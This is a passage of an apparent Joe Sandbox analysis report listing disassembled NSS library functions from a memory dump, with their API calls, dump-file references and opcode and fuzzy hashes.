                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                          • String ID:
                                                                                          • API String ID: 1549229083-0
                                                                                          • Opcode ID: c16cf9462394058f853f19c36a6856c2b435b7b176c4a171a55801829e8732b6
                                                                                          • Instruction ID: 14f37d5f833c9ef4b2169dca9d9c10b7b61e79b556b5b92fc64dcfdcc8bab312
                                                                                          • Opcode Fuzzy Hash: c16cf9462394058f853f19c36a6856c2b435b7b176c4a171a55801829e8732b6
                                                                                          • Instruction Fuzzy Hash: 926184B0E023859BEB00DF65DC81BAEB7B5EF04748F184128ED29AB741EB31D945CB52
                                                                                          Function 6CB8ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE10
                                                                                          • EnterCriticalSection.KERNEL32(?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE24
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,6CB6D079,00000000,00000001), ref: 6CB8AE5A
                                                                                          • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE6F
                                                                                          • free.MOZGLUE(85145F8B,?,?,?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE7F
                                                                                          • TlsGetValue.KERNEL32(?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AEB1
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AEC9
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AEF1
                                                                                          • free.MOZGLUE(6CB6CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB6CDBB,?), ref: 6CB8AF0B
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AF30
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                          • String ID:
                                                                                          • API String ID: 161582014-0
                                                                                          • Opcode ID: e4e9aae2e995948ee297287362372b594eb8336c964b08230a3310ae3a1bc789
                                                                                          • Instruction ID: fe8d6f8313064ed95f0c5e73e9d6fef89df5108c84b6f68d76ffa00323399991
                                                                                          • Opcode Fuzzy Hash: e4e9aae2e995948ee297287362372b594eb8336c964b08230a3310ae3a1bc789
                                                                                          • Instruction Fuzzy Hash: D6516EB1A02642EFDB01DF25D884B5AB7B4FF09319F144664E81897A51E731E864CFE2
                                                                                          Function 6CB64CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CB6AB7F,?,00000000,?), ref: 6CB64CB4
                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6CB6AB7F,?,00000000,?), ref: 6CB64CC8
                                                                                          • TlsGetValue.KERNEL32(?,6CB6AB7F,?,00000000,?), ref: 6CB64CE0
                                                                                          • EnterCriticalSection.KERNEL32(?,?,6CB6AB7F,?,00000000,?), ref: 6CB64CF4
                                                                                          • PL_HashTableLookup.NSS3(?,?,?,6CB6AB7F,?,00000000,?), ref: 6CB64D03
                                                                                          • PR_Unlock.NSS3(?,00000000,?), ref: 6CB64D10
                                                                                            • Part of subcall function 6CBEDD70: TlsGetValue.KERNEL32 ref: 6CBEDD8C
                                                                                            • Part of subcall function 6CBEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBEDDB4
                                                                                          • PR_Now.NSS3(?,00000000,?), ref: 6CB64D26
                                                                                            • Part of subcall function 6CC09DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC50A27), ref: 6CC09DC6
                                                                                            • Part of subcall function 6CC09DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC50A27), ref: 6CC09DD1
                                                                                            • Part of subcall function 6CC09DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC09DED
                                                                                          • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CB64D98
                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CB64DDA
                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CB64E02
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 4032354334-0
                                                                                          • Opcode ID: ffd7263a59f795260f69be5b8e9d8f4dbc1994b5191d1403b8421535cc75710b
                                                                                          • Instruction ID: 6caafa09a7d27eba4f5bafbd9052e9729175aaf29e3f11ebaf40cf51f6f6bad9
                                                                                          • Opcode Fuzzy Hash: ffd7263a59f795260f69be5b8e9d8f4dbc1994b5191d1403b8421535cc75710b
                                                                                          • Instruction Fuzzy Hash: FA41A4B5E006559BEB019F69E854A5A77B8EF06259F044170EC1887B11EB31DD28CBA2
                                                                                          Function 6CB42E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB42CDA,?,00000000), ref: 6CB42E1E
                                                                                            • Part of subcall function 6CB9FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB49003,?), ref: 6CB9FD91
                                                                                            • Part of subcall function 6CB9FD80: PORT_Alloc_Util.NSS3(A4686CBA,?), ref: 6CB9FDA2
                                                                                            • Part of subcall function 6CB9FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CBA,?,?), ref: 6CB9FDC4
                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6CB42E33
                                                                                            • Part of subcall function 6CB9FD80: free.MOZGLUE(00000000,?,?), ref: 6CB9FDD1
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB42E4E
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB42E5E
                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6CB42E71
                                                                                          • PL_HashTableRemove.NSS3(?), ref: 6CB42E84
                                                                                          • PL_HashTableAdd.NSS3(?,00000000), ref: 6CB42E96
                                                                                          • PR_Unlock.NSS3 ref: 6CB42EA9
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB42EB6
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB42EC5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3332421221-0
                                                                                          • Opcode ID: dabea26e14fddc240c0a7419fd53f5c2f7009405c49d58b547b84f0ecd097c81
                                                                                          • Instruction ID: 5008a6d82350a6de5f8793f6eb104aed9cbbef1b29e0160ba384dcebca0a4057
                                                                                          • Opcode Fuzzy Hash: dabea26e14fddc240c0a7419fd53f5c2f7009405c49d58b547b84f0ecd097c81
                                                                                          • Instruction Fuzzy Hash: B221D376A40151A7EF111BAAAD0DE9F3B74EB52359F044030ED1CC7711FB32C559E6A2
                                                                                          Function 6CACCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CACB999), ref: 6CACCFF3
                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CACB999), ref: 6CACD02B
                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CACB999), ref: 6CACD041
                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CACB999), ref: 6CC1972B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                          • API String ID: 491875419-598938438
                                                                                          • Opcode ID: 3616a4a9aa307e4553a428e1699e6c18f9f764a831aed8bd03e97706790a540f
                                                                                          • Instruction ID: c7c4d955470973802e253e1a047d3f064b97b8cc5b22777957b6a5e13c3d7120
                                                                                          • Opcode Fuzzy Hash: 3616a4a9aa307e4553a428e1699e6c18f9f764a831aed8bd03e97706790a540f
                                                                                          • Instruction Fuzzy Hash: AA610771A042108BD310CF2AC840BA7B7F5EF95318F2845ADE4599BB42E376D987C7E1
                                                                                          Function 6CBCEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCEF6D
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • htonl.WSOCK32(00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCEFE4
                                                                                          • htonl.WSOCK32(?,00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCEFF1
                                                                                          • memcpy.VCRUNTIME140(?,?,6CBEA4A1,?,00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCF00B
                                                                                          • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6CBEA4A1,?,00000000,?,00000001), ref: 6CBCF027
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: htonlmemcpy$ErrorValue
                                                                                          • String ID: dtls13
                                                                                          • API String ID: 242828995-1883198198
                                                                                          • Opcode ID: 149b5e92c58b0dab3a1f1032324c735daebede7d62fe96f2c71b68fcdfa6bf38
                                                                                          • Instruction ID: 9540f0d82ae63f95711acffd669e585075ecc11160834876354963af786f336a
                                                                                          • Opcode Fuzzy Hash: 149b5e92c58b0dab3a1f1032324c735daebede7d62fe96f2c71b68fcdfa6bf38
                                                                                          • Instruction Fuzzy Hash: 0C311271A00251EFDB10CF28DC81B8EB7E8EF49348F158029E8189B751E731E925CBE6
                                                                                          Function 6CB8CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CB8CD08
                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6CB8CE16
                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6CB8D079
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                          • String ID:
                                                                                          • API String ID: 1351604052-0
                                                                                          • Opcode ID: 004d168a8d2f7784abb0593b2f07e364b13cbe3f2c6b7300ec3369fd7bf18315
                                                                                          • Instruction ID: 648193d7ab72411418c583f992780d04206561a2dc7816f4de55c435568ecd85
                                                                                          • Opcode Fuzzy Hash: 004d168a8d2f7784abb0593b2f07e364b13cbe3f2c6b7300ec3369fd7bf18315
                                                                                          • Instruction Fuzzy Hash: 63C19EB1A012599BDB10CF24DC80BDAB7B8FF48308F1442A9E948A7741E775EE95CF91
                                                                                          Function 6CB42C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_ZAlloc_Util.NSS3(1BAF25D8), ref: 6CB42C5D
                                                                                            • Part of subcall function 6CBA0D30: calloc.MOZGLUE ref: 6CBA0D50
                                                                                            • Part of subcall function 6CBA0D30: TlsGetValue.KERNEL32 ref: 6CBA0D6D
                                                                                          • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CB42C8D
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB42CE0
                                                                                            • Part of subcall function 6CB42E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB42CDA,?,00000000), ref: 6CB42E1E
                                                                                            • Part of subcall function 6CB42E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB42E33
                                                                                            • Part of subcall function 6CB42E00: TlsGetValue.KERNEL32 ref: 6CB42E4E
                                                                                            • Part of subcall function 6CB42E00: EnterCriticalSection.KERNEL32(?), ref: 6CB42E5E
                                                                                            • Part of subcall function 6CB42E00: PL_HashTableLookup.NSS3(?), ref: 6CB42E71
                                                                                            • Part of subcall function 6CB42E00: PL_HashTableRemove.NSS3(?), ref: 6CB42E84
                                                                                            • Part of subcall function 6CB42E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB42E96
                                                                                            • Part of subcall function 6CB42E00: PR_Unlock.NSS3 ref: 6CB42EA9
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB42D23
                                                                                          • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CB42D30
                                                                                          • CERT_MakeCANickname.NSS3(00000001), ref: 6CB42D3F
                                                                                          • free.MOZGLUE(00000000), ref: 6CB42D73
                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6CB42DB8
                                                                                          • free.MOZGLUE ref: 6CB42DC8
                                                                                            • Part of subcall function 6CB43E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB43EC2
                                                                                            • Part of subcall function 6CB43E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB43ED6
                                                                                            • Part of subcall function 6CB43E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB43EEE
                                                                                            • Part of subcall function 6CB43E60: PR_CallOnce.NSS3(6CCA2AA4,6CBA12D0), ref: 6CB43F02
                                                                                            • Part of subcall function 6CB43E60: PL_FreeArenaPool.NSS3 ref: 6CB43F14
                                                                                            • Part of subcall function 6CB43E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB43F27
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                          • String ID:
                                                                                          • API String ID: 3941837925-0
                                                                                          • Opcode ID: 100111e1c1f48fec8dc5a6dccc8e3bc933d44ba031bd07b45111ba261bb97ec4
                                                                                          • Instruction ID: aab847d8baf78e5bc92cc0b6c8db682dd59741546a1684b77a8dc27119111d2c
                                                                                          • Opcode Fuzzy Hash: 100111e1c1f48fec8dc5a6dccc8e3bc933d44ba031bd07b45111ba261bb97ec4
                                                                                          • Instruction Fuzzy Hash: E851EF71A083619BEB00DE29DC89B5B77E5EF88348F14842CEC59C3655EB31E815BB93
                                                                                          Function 6CB68F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CB5DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CB68FAF
                                                                                          • PR_Now.NSS3(?,?,00000002,?,?,?,6CB5DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CB68FD1
                                                                                          • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CB5DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CB68FFA
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CB5DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CB69013
                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CB5DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CB69042
                                                                                          • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CB5DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CB6905A
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CB5DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CB69073
                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CB5DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CB690EC
                                                                                            • Part of subcall function 6CB30F00: PR_GetPageSize.NSS3(6CB30936,FFFFE8AE,?,6CAC16B7,00000000,?,6CB30936,00000000,?,6CAC204A), ref: 6CB30F1B
                                                                                            • Part of subcall function 6CB30F00: PR_NewLogModule.NSS3(clock,6CB30936,FFFFE8AE,?,6CAC16B7,00000000,?,6CB30936,00000000,?,6CAC204A), ref: 6CB30F25
                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CB5DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CB69111
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                          • String ID:
                                                                                          • API String ID: 2831689957-0
                                                                                          • Opcode ID: b7eac3e170722b99a640ff1df1973ac776375ac3b3bcbe0203486c543877ceb1
                                                                                          • Instruction ID: 73ba38d1f8b2ac2ea6e90afd4cb244481e5bdbccfcbc1e06cf2b06e71804829b
                                                                                          • Opcode Fuzzy Hash: b7eac3e170722b99a640ff1df1973ac776375ac3b3bcbe0203486c543877ceb1
                                                                                          • Instruction Fuzzy Hash: 3A518870A04294CFCF00EF7AD488259BBF4EF4A318F155569DC899BB05EB31E885CB82
                                                                                          Function 6CBA4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CBA536F,00000022,?,?,00000000,?), ref: 6CBA4E70
                                                                                          • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CBA4F28
                                                                                          • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CBA4F8E
                                                                                          • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CBA4FAE
                                                                                          • free.MOZGLUE(?), ref: 6CBA4FC8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                          • String ID: %s=%c%s%c$%s=%s
                                                                                          • API String ID: 2709355791-2032576422
                                                                                          • Opcode ID: 6ab097ea6dc5960efd0b275582425cab21002eef4d85a619d3c62aebbf4ef375
                                                                                          • Instruction ID: 287d60b00715c76db82d4ba2db9e6d4109ddab091a7105f5339cdc333c9b1faf
                                                                                          • Opcode Fuzzy Hash: 6ab097ea6dc5960efd0b275582425cab21002eef4d85a619d3c62aebbf4ef375
                                                                                          • Instruction Fuzzy Hash: 90512831A0C1C58BEF05CAE984907FE7BF5DF46348F18A125E8D5A7A41DB2698078F92
                                                                                          Function 6CC12F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON
